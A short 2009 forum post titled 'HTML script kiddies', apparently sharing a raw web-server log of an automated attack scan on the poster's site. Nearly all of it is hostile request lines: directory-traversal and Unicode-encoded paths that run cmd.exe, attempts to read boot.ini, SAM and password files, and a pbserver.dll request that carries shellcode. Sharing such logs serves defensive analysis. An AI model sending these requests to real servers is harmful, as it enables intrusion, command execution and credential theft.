Home :: Forums :: Our Forum

HTML script kiddies

By Sami - Posted on January 17th, 2009
Tagged:  

Please feel free to comment on the code

-GET / HTTP/1.1

-GET / HTTP/1.1

-HEAD /qweiop43809442fsfjflr.html
HTTP/1.1

-GET /_vti_inf.html HTTP/1.1

-GET / HTTP/1.1

-HEAD
/cgi-bin/buy.storefront/3baecb4a00025ad227a4c30e95010642/winnt/cmd.exe?/c+dir+c:\
HTTP/1.1

-HEAD /cgi-bin/perlis.dll HTTP/1.1

-POST /_vti_bin/_vti_aut/author.dll
HTTP/1.1 (application/x-www-form-urlencoded)
-HEAD
/Scripts/..%u0025u005c..u0025u005cWINNT/system32/cmd.exe?/c+dir+c:
HTTP/1.1

-HEAD /iissamples/ISSamples/SQLQHit.asp
HTTP/1.1

-HEAD /index.asp.bak HTTP/1.1

-HEAD /_vti_bin/_vti_aut/fp30reg.dll
HTTP/1.1

-HEAD
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir%20c:\
HTTP/1.1

-HEAD
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.1

-HEAD
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\
HTTP/1.1

-HEAD
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir%20c:\
HTTP/1.1

-HEAD
/_mem_bin/..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:\
HTTP/1.1

-HEAD /\../readme.txt HTTP/1.1

-HEAD /..\..\..\..\..\..\autoexec.bat
HTTP/1.1

-HEAD /..\..\..\..\..\autoexec.bat
HTTP/1.1

-HEAD /..\..\..\winnt\repair\sam._
HTTP/1.1

-HEAD /../boot.ini HTTP/1.1

-HEAD /...../boot.ini HTTP/1.1

-HEAD /....../boot.ini HTTP/1.1

-HEAD /......./boot.ini HTTP/1.1

-HEAD /......../boot.ini HTTP/1.1

-HEAD /........./boot.ini HTTP/1.1

-HEAD /........../boot.ini HTTP/1.1

-HEAD /.........../boot.ini HTTP/1.1

-HEAD /............/boot.ini HTTP/1.1

-HEAD /............./boot.ini HTTP/1.1

-HEAD /............../boot.ini HTTP/1.1

-HEAD /.............../boot.ini
HTTP/1.1

-HEAD /................/boot.ini
HTTP/1.1

-HEAD /................./boot.ini
HTTP/1.1

-HEAD /................../boot.ini
HTTP/1.1

-HEAD /.................../boot.ini
HTTP/1.1

-HEAD /..................../boot.ini
HTTP/1.1

-HEAD /...................../config.sys
HTTP/1.1

-HEAD /nofile.pl HTTP/1.1

-HEAD /\../config.sys HTTP/1.1

-HEAD /\../boot.ini HTTP/1.1

-HEAD /../../boot.ini HTTP/1.1

-HEAD /../../../boot.ini HTTP/1.1

-HEAD /../../../../boot.ini HTTP/1.1

-HEAD /../../../../../boot.ini HTTP/1.1

-HEAD /../../../../../../boot.ini
HTTP/1.1

-HEAD /../../../../../../../../boot.ini
HTTP/1.1

-HEAD /sample.asp HTTP/1.1

-HEAD /cgi-bin/guestbook.cgi HTTP/1.1

-HEAD /private HTTP/1.1

-HEAD /cgi-bin/test.cgi HTTP/1.1

-HEAD
/pbserver/pbserver.dll?OSArch=0&OSType=2&LCID=EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE&OSVer=%55%8B%EC%90%90%90%90%90%bb%ff%ff%ff%ff%83%eb%8b%53%68%6e%2e%74%78%68%76%6f%72%75%68%20%70%73%72%68%69%72%20%3e%68%2f%63%20%64%90%90&CMVer=%68%65%78%65%20%68%63%6d%64%2e%B8%86%a9%f1%77%8b%dc%33%f6%56%53%ff%d0%90%90DDDDDDDDDDDDDDDDDDD&PBVer=&0PB=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%4c%55%93%5e%cc%ccAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%e4%51%93%5ennnn
HTTP/1.1

-HEAD /cgi-bin/dbmlparser.exe HTTP/1.1

-HEAD
/cfdocs/exampleapp/email/application.cfm HTTP/1.1

-HEAD
/cfdocs/exampleapp/publish/admin/application.cfm HTTP/1.1

-HEAD /cfdocs/cfcache.map HTTP/1.1

-HEAD /cfdocs/MOLE.CFM HTTP/1.1

-HEAD /cfdocs/TOXIC.CFM HTTP/1.1

-HEAD /cfdocs/expressions.cfm HTTP/1.1

-HEAD /..\..\..\autoexec.bat HTTP/1.1

-HEAD /..\..\..\..\autoexec.bat
HTTP/1.1

-HEAD /cfdocs/zero.cfm HTTP/1.1

-HEAD /page.cfm HTTP/1.1

-HEAD
/CFIDE/Administrator/startstop.html HTTP/1.1

-HEAD /cfdocs/snippets/ HTTP/1.1

-HEAD /cfide/Administrator/ HTTP/1.1

-HEAD /cfdocs/exampleapp/ HTTP/1.1

-HEAD /cfdocs/examples/ HTTP/1.1

-HEAD /cfappman/ HTTP/1.1

-HEAD /cfide/ HTTP/1.1

-HEAD /..../boot.ini HTTP/1.1

-HEAD /.../boot.ini HTTP/1.1

-HEAD /../../winnt/win.ini HTTP/1.1

-HEAD /..\..\autoexec.bat HTTP/1.1

-HEAD /cfdocs/ HTTP/1.1

-HEAD /_vti_bin/_vti_aut/dvwssr.dll
HTTP/1.1

-HEAD /_vti_bin/shtml.dll/_vti_rpc
HTTP/1.1

-HEAD /..../Windows/Admin.pwl HTTP/1.1

-HEAD /cgi-win/wincgi.bat HTTP/1.1

-HEAD /scripts/../../cmd.exe HTTP/1.1

-HEAD /cgi-bin/visitor.exe HTTP/1.1

-HEAD /scripts/iisadmin/default.htm
HTTP/1.1

-HEAD /scripts/perl HTTP/1.1

-HEAD
/AdvWorks/equipment/catalog_type.asp HTTP/1.1

-HEAD /scripts/convert.bas HTTP/1.1

-HEAD /scripts/cpshost.dll HTTP/1.1

-HEAD /scripts/proxy/w3proxy.dll
HTTP/1.1

-HEAD /_vti_adm/admin.dll HTTP/1.1

-HEAD /_vti_bin/_vti_aut/author.dll
HTTP/1.1

-HEAD /msadc/samples/adctest.asp
HTTP/1.1

-HEAD /scripts/Fpadmcgi.exe HTTP/1.1

-HEAD /scripts/iisadmin HTTP/1.1

-HEAD /_vti_bin/_vti_aut HTTP/1.1

-HEAD /_vti_bin/_vti_adm HTTP/1.1

-HEAD /cgi-bin/_vti_cnf HTTP/1.1

-HEAD /_vti_bin HTTP/1.1

-HEAD /_private HTTP/1.1

-HEAD /_vti_txt HTTP/1.1

-HEAD /_vti_pvt HTTP/1.1

-HEAD /scripts/IISADMPWD HTTP/1.1

-HEAD /scripts/iisadmin/tools HTTP/1.1

-HEAD /admisapi/ HTTP/1.1

-HEAD /scripts/iisadmin/samples
HTTP/1.1

-HEAD /Scripts/tools HTTP/1.1

-HEAD /_vti_log HTTP/1.1

-HEAD /Scripts/samples HTTP/1.1

-HEAD /iisamples/Sdk HTTP/1.1

-HEAD /iissamples/ISSamples HTTP/1.1

-HEAD /iissamples/ExAir HTTP/1.1

-HEAD /iissamples/Default HTTP/1.1

-HEAD /iissamples HTTP/1.1

-HEAD /iisadmin HTTP/1.1

-HEAD /srchadm HTTP/1.1

-HEAD /cgi-bin/ HTTP/1.1

-HEAD /Scripts HTTP/1.1

-HEAD /cgi-bin/GWWEB.EXE HTTP/1.1

-HEAD /cgi-bin/GW5/GWWEB.EXE HTTP/1.1

-HEAD /cgi-bin/GW5 HTTP/1.1

-HEAD /....../config.sys HTTP/1.1

-HEAD /....../autoexec.bat HTTP/1.1

-HEAD /.html/............/autoexec.bat
HTTP/1.1

-HEAD /.html/............./config.sys
HTTP/1.1

-HEAD /.html/............*/config.sys
HTTP/1.1

-HEAD /wwwboard/passwd.txt HTTP/1.1

-HEAD /wwwboard.pl HTTP/1.1

-HEAD /ws_ftp.ini HTTP/1.1

-HEAD /WebShop/templates/cc.txt
HTTP/1.1

-HEAD /WebShop/logs/ck.log HTTP/1.1

-HEAD /WebShop/logs/cc.txt HTTP/1.1

-HEAD /user.log HTTP/1.1

-HEAD /user.dat HTTP/1.1

-HEAD /tree.dat HTTP/1.1

-HEAD /today.nsf HTTP/1.1

-HEAD /ssi/envout.bat HTTP/1.1

-HEAD /smdata.dat HTTP/1.1

-HEAD /showfile.asp HTTP/1.1

-HEAD /session/adminlogin HTTP/1.1

-HEAD /server-status HTTP/1.1

-HEAD /server-info HTTP/1.1

-HEAD /secure/.wwwacl HTTP/1.1

-HEAD /secure/.htaccess HTTP/1.1

-HEAD /search97.vts HTTP/1.1

-HEAD /search HTTP/1.1

-HEAD /scripts/wsisa.dll HTTP/1.1

-HEAD /scripts/wguest.exe HTTP/1.1

-HEAD /scripts/webbbs.exe HTTP/1.1

-HEAD /scripts/wa.exe HTTP/1.1

-HEAD /scripts/visadmin.exe HTTP/1.1

-HEAD /scripts/uploadx.asp HTTP/1.1

-HEAD /scripts/uploadn.asp HTTP/1.1

-HEAD /scripts/upload.asp HTTP/1.1

-HEAD /scripts/tools/uploadx.asp
HTTP/1.1

-HEAD /scripts/tools/uploadn.asp
HTTP/1.1

-HEAD /scripts/tools/newdsn.exe
HTTP/1.1

-HEAD /scripts/tools/mkilog.exe
HTTP/1.1

-HEAD /scripts/tools/getdrvs.exe
HTTP/1.1

-HEAD /scripts/tools/getdrvrs.exe
HTTP/1.1

-HEAD /scripts/tools/dsnform.exe
HTTP/1.1

-HEAD /scripts/srchadm/webhits.exe
HTTP/1.1

-HEAD /scripts/slxweb.dll HTTP/1.1

-HEAD
/scripts/samples/search/webhits.exe HTTP/1.1

-HEAD
/scripts/samples/search/simple.idq HTTP/1.1

-HEAD
/scripts/samples/search/queryhit.idq HTTP/1.1

-HEAD /scripts/samples/search/query.idq
HTTP/1.1

-HEAD
/scripts/samples/search/qsumrhit.htw HTTP/1.1

-HEAD
/scripts/samples/search/qfullhit.htw HTTP/1.1

-HEAD
/scripts/samples/search/filetime.idq HTTP/1.1

-HEAD
/scripts/samples/search/filesize.idq HTTP/1.1

-HEAD
/scripts/samples/search/author.idq HTTP/1.1

-HEAD /scripts/samples/details.idc
HTTP/1.1

-HEAD /scripts/samples/ctguestb.idc
HTTP/1.1

-HEAD /scripts/rguest.exe HTTP/1.1

-HEAD /scripts/repost.asp HTTP/1.1

-HEAD /scripts/proxy/w3proxy.dll
HTTP/1.1

-HEAD /scripts/postinfo.asp HTTP/1.1

-HEAD /scripts/pfieffer.cmd HTTP/1.1

-HEAD /scripts/pfieffer.bat HTTP/1.1

-HEAD /scripts/perl HTTP/1.1

-HEAD /scripts/no-such-file.pl HTTP/1.1

-HEAD /scripts/lsass.exe HTTP/1.1

-HEAD /scripts/issadmin/bdir.htr
HTTP/1.1

-HEAD
/scripts/iisadmin/tools/mkilog.exe HTTP/1.1

-HEAD
/scripts/iisadmin/tools/getdrvrs.exe HTTP/1.1

-HEAD /scripts/iisadmin/tools/ctss.idc
HTTP/1.1

-HEAD
/scripts/iisadmin/ism.dll?http/dir HTTP/1.1

-HEAD /scripts/iisadmin/ism.dll
HTTP/1.1

-HEAD /scripts/iisadmin/bdir.htr
HTTP/1.1

-HEAD /scripts/htimage.exe HTTP/1.1

-HEAD /scripts/fpcount.exe HTTP/1.1

-HEAD /scripts/environ.pl HTTP/1.1

-HEAD /scripts/emurl/RECMAN.dll
HTTP/1.1

-HEAD
/scripts/dbman/db.cgi?db=invalid-db HTTP/1.1

-HEAD /scripts/cpshost.dll HTTP/1.1

-HEAD /scripts/counter.exe HTTP/1.1

-HEAD /scripts/convert.bas HTTP/1.1

-HEAD /scripts/cmd32.exe?/c+dir
HTTP/1.1

-HEAD /scripts/cmd32.exe HTTP/1.1

-HEAD /scripts/cmd.exe?/c+dir%20c:\
HTTP/1.1

-HEAD /scripts/cmd.exe HTTP/1.1

-HEAD /scripts/CGImail.exe HTTP/1.1

-HEAD
/scripts/cart32.exe/cart32clientlist HTTP/1.1

-HEAD
/scripts/c32web.exe/ChangeAdminPassword HTTP/1.1

-HEAD
/scripts/.._../winnt/system32/cmd.exe?/c+dir HTTP/1.1

-HEAD
/scripts/..\..\..\..\../winnt/system32/cmd.exe?/c+dir%20c:\ HTTP/1.1

-HEAD
/scripts/..\..\..\..\../winnt/system32/cmd.exe?/c+dir HTTP/1.1

-HEAD
/scripts/..\../winnt/system32/cmd.exe?/c+dir%20c:\ HTTP/1.1

-HEAD
/scripts/../../winnt/system32/cmd.exe?/c+dir HTTP/1.1

-HEAD /scripts/../../cmd.exe HTTP/1.1

-HEAD
/scripts/../../../../../winnt/system32/cmd.exe?/c+dir%20c:\ HTTP/1.1

-HEAD
/scripts/../../../../../winnt/system32/cmd.exe?/c+dir HTTP/1.1

-HEAD
/scripts/..%c1%9f../winnt/system32/cmd.exe?/c+dir%20c:\ HTTP/1.1

-HEAD
/scripts/..%c1%9f../winnt/system32/cmd.exe?/c+dir HTTP/1.1

-HEAD
/scripts/..%c1%9f../..%c1%9f../..%c1%9f../winnt/system32/cmd.exe?/c+dir%20c:\
HTTP/1.1

-HEAD
/scripts/..%c1%9c..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe
HTTP/1.1

-HEAD
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir%20c:\ HTTP/1.1

-HEAD
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.1

-HEAD
/scripts/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir%20c:\
HTTP/1.1

-HEAD
/scripts/..%c1%1c..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe
HTTP/1.1

-HEAD
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir%20c:\ HTTP/1.1

-HEAD
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.1

-HEAD
/scripts/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir%20c:\
HTTP/1.1

-HEAD
/scripts/..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe
HTTP/1.1

-HEAD
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir%20c:\ HTTP/1.1

-HEAD
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.1

-HEAD
/scripts/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir%20c:\
HTTP/1.1

-HEAD
/scripts/..%c0%2f..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe
HTTP/1.1

-HEAD /scripts/*.pl HTTP/1.1

-HEAD /scripts/* HTTP/1.1

-HEAD /scripts/ HTTP/1.1

-HEAD /scripts HTTP/1.1

-HEAD
/script/.._../winnt/system32/cmd.exe?/c+dir HTTP/1.1

-HEAD
/script/..%c1%9f../..%c1%9f../..%c1%9f../winnt/system32/cmd.exe?/c+dir%20c:\
HTTP/1.1

-HEAD
/script/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir%20c:\
HTTP/1.1

-HEAD
/script/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir%20c:\
HTTP/1.1

-HEAD
/script/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir%20c:\
HTTP/1.1

-HEAD /samples/search/queryhit.htm
HTTP/1.1

-HEAD /robots.txt HTTP/1.1

-HEAD /rightfax/fuwww.dll/ HTTP/1.1

-HEAD /password.txt HTTP/1.1

-HEAD /password.log HTTP/1.1

-HEAD /password.dat HTTP/1.1

-HEAD /password HTTP/1.1

-HEAD /passwd.txt HTTP/1.1

-HEAD /passwd HTTP/1.1

-HEAD
/msads/samples/selector/showcode.asp HTTP/1.1

-HEAD
/msads/Samples/SELECTOR/showcode.asp HTTP/1.1

-HEAD
/msadc/samples/selector/showcode.asp_2 HTTP/1.1

-HEAD
/msadc/samples/selector/showcode.asp HTTP/1.1

-HEAD
/msadc/Samples/SELECTOR/showcode.asp HTTP/1.1

-HEAD
/msadc/Samples/SELECTOR/codebrws.cfm HTTP/1.1

-HEAD /msadc/samples/adctest.asp
HTTP/1.1

-HEAD /msadc/msadcs.dll HTTP/1.1

-HEAD
/msadc/.._../winnt/system32/cmd.exe?/c+dir HTTP/1.1

-HEAD
/msadc/..\..\..\../winnt/system32/cmd.exe?/c+dir%20c:\ HTTP/1.1

-HEAD
/msadc/..\../..\../..\../winnt/system32/cmd.exe?/c+dir%20c:\ HTTP/1.1

-HEAD
/msadc/..\../..\../..\../winnt/system32/cmd.exe?/c+dir HTTP/1.1

-HEAD
/msadc/../../../../winnt/system32/cmd.exe?/c+dir%20c:\ HTTP/1.1

-HEAD
/msadc/..%c1%9f../winnt/system32/cmd.exe?/c+dir%20c:\ HTTP/1.1

-HEAD
/msadc/..%c1%9f../..%c1%9f../..%c1%9f../winnt/system32/cmd.exe?/c+dir
HTTP/1.1

-HEAD
/msadc/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe HTTP/1.1

-HEAD
/msadc/..%c1%1c../winnt/system32/cmd.exe?/c+dir%20c:\ HTTP/1.1

-HEAD
/msadc/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir%20c:\
HTTP/1.1

-HEAD
/msadc/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
HTTP/1.1

-HEAD
/msadc/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe HTTP/1.1

-HEAD
/msadc/..%c0%af../winnt/system32/cmd.exe?/c+dir%20c:\ HTTP/1.1

-HEAD
/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir%20c:\
HTTP/1.1

-HEAD
/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
HTTP/1.1

-HEAD
/msadc/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe HTTP/1.1

-HEAD
/msadc/..%c0%2f../winnt/system32/cmd.exe?/c+dir%20c:\ HTTP/1.1

-HEAD
/msadc/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir%20c:\
HTTP/1.1

-HEAD
/msadc/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir
HTTP/1.1

-HEAD
/msadc/..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe HTTP/1.1

-HEAD /msadc HTTP/1.1

-HEAD /main.asp+.htr HTTP/1.1

-HEAD /main.asp\\ HTTP/1.1

-HEAD /main.asp::$DATA HTTP/1.1

-HEAD /main.asp. HTTP/1.1

-HEAD /main.asp%81 HTTP/1.1

-HEAD /main.asp%2e%41sp HTTP/1.1

-HEAD /main.asp%2e HTTP/1.1

-HEAD /index.asp+.htr HTTP/1.1

-HEAD /index.asp\\ HTTP/1.1

-HEAD /index.asp::$DATA HTTP/1.1

-HEAD /index.asp. HTTP/1.1

-HEAD /index.asp%81 HTTP/1.1

-HEAD /index.asp%2e%41sp HTTP/1.1

-HEAD /index.asp%2e HTTP/1.1

-HEAD /include/HEAD.html HTTP/1.1

-HEAD /include/css.css HTTP/1.1

-HEAD
/iissamples/sdk/asp/docs/codebrws.asp HTTP/1.1

-HEAD /iissamples/issamples/query.idq
HTTP/1.1

-HEAD /iissamples/issamples/query.asp
HTTP/1.1

-HEAD
/iissamples/issamples/oop/qsumrhit.htw HTTP/1.1

-HEAD
/iissamples/issamples/oop/qfullhit.htw HTTP/1.1

-HEAD /iissamples/issamples/fastq.idq
HTTP/1.1

-HEAD /iissamples/iissamples/query.asp
HTTP/1.1

-HEAD
/iissamples/exair/search/search.idq HTTP/1.1

-HEAD
/IISSAMPLES/ExAir/Search/search.asp HTTP/1.1

-HEAD
/iissamples/exair/search/query.idq HTTP/1.1

-HEAD
/iissamples/exair/search/qsumrhit.htw HTTP/1.1

-HEAD
/iissamples/exair/search/qfullhit.htw HTTP/1.1

-HEAD
/iissamples/exair/search/advsearch.asp HTTP/1.1

-HEAD
/iissamples/exair/howitworks/showcode.asp HTTP/1.1

-HEAD
/iissamples/exair/howitworks/codebrws.asp HTTP/1.1

-HEAD
/iissamples/exair/howitworks/code.asp HTTP/1.1

-HEAD /iishelp/iis/misc/iirturnh.htw
HTTP/1.1

-HEAD /iisadmpwd/anot3.htr HTTP/1.1

-HEAD /iisadmpwd/anot.htr HTTP/1.1

-HEAD /iisadmpwd/aexp4b.htr HTTP/1.1

-HEAD /iisadmpwd/aexp4.htr HTTP/1.1

-HEAD /iisadmpwd/aexp3.htr HTTP/1.1

-HEAD /iisadmpwd/aexp2b.htr HTTP/1.1

-HEAD /iisadmpwd/aexp2.htr HTTP/1.1

-HEAD /iisadmpwd/aexp.htr HTTP/1.1

-HEAD /IISADMPWD/achg.htr HTTP/1.1

-HEAD /iisadmpwd/achg.htr HTTP/1.1

-HEAD /iisadmin/ HTTP/1.1

-HEAD /hosts.dat HTTP/1.1

-HEAD /HEAD.css HTTP/1.1

-HEAD /global.asa+.htr HTTP/1.1

-HEAD
/GetFile.cfm?FT=Text&FST=Plain&FilePath=C:\\WINNT\\repair\\sam._
HTTP/1.1

-HEAD /getfile.cfm HTTP/1.1

-HEAD /doc HTTP/1.1

-HEAD /default.asp+.htr HTTP/1.1

-HEAD /default.asp\\ HTTP/1.1

-HEAD /default.asp::$DATA HTTP/1.1

-HEAD /default.asp. HTTP/1.1

-HEAD /default.asp%81 HTTP/1.1

-HEAD /default.asp%2e%41sp HTTP/1.1

-HEAD /default.asp%2e HTTP/1.1

-HEAD /config/orders.txt HTTP/1.1

-HEAD /config/mountain.cfg HTTP/1.1

-HEAD /config/import.txt HTTP/1.1

-HEAD /config/checks.txt HTTP/1.1

-HEAD /con/con HTTP/1.1

-HEAD /com4 HTTP/1.1

-HEAD /com3 HTTP/1.1

-HEAD /com2 HTTP/1.1

-HEAD /com1 HTTP/1.1

-HEAD /cmd.exe?/c+dir%20c:\ HTTP/1.1

-HEAD /cgi-win/wguest.exe HTTP/1.1

-HEAD /cgi-win/uploader.exe HTTP/1.1

-HEAD /Cgi-Win/uploader.exe HTTP/1.1

-HEAD /cgi-win/perl.exe HTTP/1.1

-HEAD /cgi-win HTTP/1.1

-HEAD /cgi-shl/win-c-sample.exe
HTTP/1.1

-HEAD /cgi-dos/args.cmd HTTP/1.1

-HEAD /cgi-dos/args.bat HTTP/1.1

-HEAD /cgi-bin/windmail.exe HTTP/1.1

-HEAD /cgi-Bin/windmail.exe HTTP/1.1

-HEAD /cgi-bin/wguest.exe HTTP/1.1

-HEAD /cgi-Bin/wguest.exe HTTP/1.1

-HEAD /cgi-bin/visitor.exe HTTP/1.1

-HEAD /cgi-bin/visadmin.exe?user=guest
HTTP/1.1

-HEAD /cgi-bin/visadmin.exe HTTP/1.1

-HEAD /cgi-bin/tst.bat\dir HTTP/1.1

-HEAD /cgi-bin/tst.bat HTTP/1.1

-HEAD /cgi-bin/test.bat HTTP/1.1

-HEAD /cgi-bin/snorkerz.cmd HTTP/1.1

-HEAD /cgi-bin/snorkerz.bat HTTP/1.1

-HEAD /cgi-bin/search97.vts HTTP/1.1

-HEAD /cgi-bin/scripts/perl.exe
HTTP/1.1

-HEAD /cgi-bin/sam._ HTTP/1.1

-HEAD /cgi-bin/rguest.exe HTTP/1.1

-HEAD /Cgi-Bin/rguest.exe HTTP/1.1

-HEAD /cgi-bin/ppdscgi.exe HTTP/1.1

-HEAD /cgi-bin/perl.exe HTTP/1.1

-HEAD /Cgi-Bin/perl.exe HTTP/1.1

-HEAD /cgi-bin/mailform.exe HTTP/1.1

-HEAD /cgi-bin/input2.bat HTTP/1.1

-HEAD /cgi-bin/input.bat HTTP/1.1

-HEAD /cgi-bin/imagemap.exe HTTP/1.1

-HEAD /cgi-bin/iisadmpwd/anot.htr
HTTP/1.1

-HEAD /cgi-bin/iisadmpwd/aexp2.htr
HTTP/1.1

-HEAD /cgi-bin/iisadmpwd/aexp.htr
HTTP/1.1

-HEAD /cgi-bin/iisadmpwd/achg.htr
HTTP/1.1

-HEAD /cgi-bin/htimage.exe HTTP/1.1

-HEAD /Cgi-Bin/htimage.exe HTTP/1.1

-HEAD /cgi-bin/get32.exe\dir HTTP/1.1

-HEAD /cgi-bin/get32.exe HTTP/1.1

-HEAD /Cgi-Bin/get32.exe HTTP/1.1

-HEAD /cgi-bin/fpexplorer.exe HTTP/1.1

-HEAD /cgi-bin/fpexplore.exe HTTP/1.1

-HEAD /cgi-bin/fpcount.exe HTTP/1.1

-HEAD
/cgi-bin/.._../winnt/system32/cmd.exe?/c+dir HTTP/1.1

-HEAD
/cgi-bin/..\..\..\../winnt/system32/cmd.exe HTTP/1.1

-HEAD
/cgi-bin/../../../../winnt/system32/cmd.exe HTTP/1.1

-HEAD
/cgi-bin/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe HTTP/1.1

-HEAD
/cgi-bin/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe HTTP/1.1

-HEAD
/cgi-bin/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe HTTP/1.1

-HEAD
/cgi-bin/..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe HTTP/1.1

-HEAD /Cgi-Bin/ HTTP/1.1

-HEAD /cgi-bin HTTP/1.1

-HEAD /cgibin HTTP/1.1

-HEAD /cgi HTTP/1.1

-HEAD /cfusion/database/smpolicy.mdb
HTTP/1.1

-HEAD /cfusion/database/cypress.mdb
HTTP/1.1

-HEAD /cfusion/database/cfsnippets.mdb
HTTP/1.1

-HEAD
/cfusion/cfapps/security/realm_.mdb HTTP/1.1

-HEAD
/cfusion/cfapps/security/data/realm.mdb HTTP/1.1

-HEAD
/cfusion/cfapps/forums/data/forums.mdb HTTP/1.1

-HEAD /cfide/administrator/index.cfm
HTTP/1.1

-HEAD /cfdocs/snippets/viewexample.cfm
HTTP/1.1

-HEAD
/cfdocs/snippets/gettempdirectory.cfm HTTP/1.1

-HEAD /cfdocs/snippets/fileexists.cfm
HTTP/1.1

-HEAD /cfdocs/snippets/evaluate.cfm
HTTP/1.1

-HEAD /cfdocs/root.cfm HTTP/1.1

-HEAD /cfdocs/expeval/sendmail.cfm
HTTP/1.1

-HEAD /cfdocs/expeval/openfile.cfm
HTTP/1.1

-HEAD /cfdocs/expeval/exprcalc.cfm
HTTP/1.1

-HEAD /cfdocs/expeval/ExprCalc.cfm
HTTP/1.1

-HEAD /cfdocs/expeval/eval.cfm HTTP/1.1

-HEAD
/cfdocs/expeval/displayopenedfile.cfm HTTP/1.1

-HEAD /cfdocs/expelval/sendmail.cfm
HTTP/1.1

-HEAD /cfdocs/expelval/openfile.cfm
HTTP/1.1

-HEAD /cfdocs/expelval/exprcalc.cfm
HTTP/1.1

-HEAD
/cfdocs/expelval/displayopenedfile.cfm HTTP/1.1

-HEAD /cfdocs/examples/parks/detail.cfm
HTTP/1.1

-HEAD
/cfdocs/examples/httpclient/mainframeset.cfm HTTP/1.1

-HEAD
/cfdocs/examples/cvbeans/beaninfo.cfm HTTP/1.1

-HEAD
/cfdocs/exampleapp/publish/admin/addcontent.cfm HTTP/1.1

-HEAD
/cfdocs/exampleapp/email/getfile.cfm?filename=c:\boot.ini HTTP/1.1

-HEAD
/cfdocs/exampleapp/email/getfile.cfm HTTP/1.1

-HEAD
/cfdocs/exampleapp/docs/sourcewindow.cfm HTTP/1.1

-HEAD /cfdocs/cfmlsyntaxcheck.cfm
HTTP/1.1

-HEAD /cfcache.map HTTP/1.1

-HEAD /cfappman/index.cfm HTTP/1.1

-HEAD /catalog.nsf/ HTTP/1.1

-HEAD /catalog.nsf HTTP/1.1

-HEAD /carbo.dll HTTP/1.1

-HEAD /blabla.idq HTTP/1.1

-GET
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.1

-HEAD
/bin/scripts/openvendor/gnete/RetrievePNBody.asp HTTP/1.1

-HEAD
/bin/scripts/.._../winnt/system32/cmd.exe?/c+dir HTTP/1.1

-HEAD
/bin/scripts/..\..\..\../winnt/system32/cmd.exe?/c+dir%20c:\ HTTP/1.1

-HEAD
/bin/scripts/..\..\..\../winnt/system32/cmd.exe?/c+dir HTTP/1.1

-HEAD
/bin/scripts/../../../../winnt/system32/cmd.exe?/c+dir%20c:\ HTTP/1.1

-HEAD
/bin/scripts/../../../../winnt/system32/cmd.exe?/c+dir HTTP/1.1

-HEAD
/bin/scripts/../../../../winnt/system32/cmd.exe/c+dir?/c+dir%20c:\
HTTP/1.1

-HEAD
/bin/scripts/..%c1%9f../winnt/system32/cmd.exe?/c+dir%20c:\ HTTP/1.1

-HEAD
/bin/scripts/..%c1%9f../..%c1%9f../..%c1%9f../winnt/system32/cmd.exe?/c+dir%20c:\
HTTP/1.1

-HEAD
/bin/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir%20c:\ HTTP/1.1

-HEAD
/bin/scripts/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir%20c:\
HTTP/1.1

-HEAD
/bin/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir%20c:\ HTTP/1.1

-HEAD
/bin/scripts/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir%20c:\
HTTP/1.1

-HEAD
/bin/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir%20c:\ HTTP/1.1

-GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.1

-HEAD
/bin/scripts/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir%20c:\
